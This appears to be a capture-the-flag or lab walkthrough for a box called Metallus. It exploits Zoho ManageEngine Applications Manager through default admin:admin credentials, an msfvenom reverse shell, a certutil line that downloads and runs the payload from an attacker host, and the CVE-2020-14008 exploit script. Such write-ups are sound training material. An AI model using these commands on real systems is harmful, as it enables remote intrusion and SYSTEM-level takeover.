# Metallus

## Nmap

```
sudo nmap 192.168.203.96 -p- -sS -sV                  

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
12000/tcp open  cce4x?
22222/tcp open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
40443/tcp open  unknown
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  tcpwrapped
49693/tcp open  java-rmi      Java RMI
49718/tcp open  unknown
49796/tcp open  unknown
49797/tcp open  unknown
4 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

Enumerating the ports we have 40443 which has produced no information from Nmap. Browsing to the port in a browser reveals a login page: <http://192.168.100.96:40443/index.do>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-516edb3dfccce8da3f144081a40d31d99c55a00a%2Fimage.png?alt=media)

We can see from the footer of the page the software is Applications Manager (Build No:14700). I was able to login with a guess on the credentials `admin:admin`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84ef88b1e053f6ccebcc1430bc787f54efd9b807%2Fimage.png?alt=media)

The target application has what are called 'Actions' which allows certain scripts and files to be executed when a certain parameter is met. To take advantage of this first we can head to **Admin > Upload Files / Binaries** to upload a `cmd` command.

Before we upload we first need to create a `msfvenom` reverse shell.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f exe -o reverse.exe
```

After this has completed we need to then create a batch file as only batch files and scripts are executed from the *Actions* on the target web server.

Create a batch command to the following:

```bash
certutil.exe -f -urlcache -split http://<IP>/reverse.exe c:\windows\temp\reverse.exe && cmd.exe /c c:\windows\temp\reverse.exe
```

Ensuring the bottom most options for '**Upload Script to \<Product\_Home>/working/**' is selected.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-300ec8bf492a97ecb2b457e9ae9691a3835cb7c0%2Fimage.png?alt=media)

After upload head over to **Actions > Execute Program** Then create a new Action as per the screenshot below:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-34ddd1a3c9eb60413c4edde0dfde65c014e2cc91%2Fimage.png?alt=media)

After creation set up a `netcat` listener to the specified port in the `msfvenom` command then start a Python\*\* SimpleHTTPServer\*\* on the attacking machine to the directory of the `msfvenom` reverse.exe file. After completing this head over to\*\* Actions > View Actions\*\* and manually execute the script under the **Execute** tab.

We should see where the script downloads the reverse.exe from the Python **SimpleHTTPServer**.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b627311889caacf2f3413fac7027cf8272565cd8%2Fimage.png?alt=media)

And soon after when the scripts executes the reverse.exe we should land a SYSTEM shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-262bfc74433d03d8470aa9c9075a09f954b69cd2%2Fimage.png?alt=media)

An alternative solution leveraging \*\*CVE:2020-14008 \*\*for a more scripted solution abusing JAR files.

**Description:**

Zoho ManageEngine Applications Manager 14710 and before allows an authenticated admin user to upload a vulnerable jar in a specific location, which leads to remote code execution.

\*\*Reference: \*\*<https://nvd.nist.gov/vuln/detail/CVE-2020-14008>

Searching for exploits with searchsploit shows a RCE for build 14700.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6a1b4617741e789653386d728b633c07f21b93bd%2Fimage.png?alt=media)

{% embed url="<https://www.exploit-db.com/exploits/48793>" %}

The syntax for the exploit script is shown below:

```bash
python3 48793.py <url> <username> <password> <reverse_shell_host> <reverse_shell_port>
python3 48793.py http://<IP>:40443 admin admin <Attacker-IP> 443
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-52a8bda197fefd51dcc7b38dc288a76dd45fdd39%2Fimage.png?alt=media)

After execution we should have another SYSTEM shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4ce7dfd2067dd15e7c9e73cb12dfa7e659e5794c%2Fimage.png?alt=media)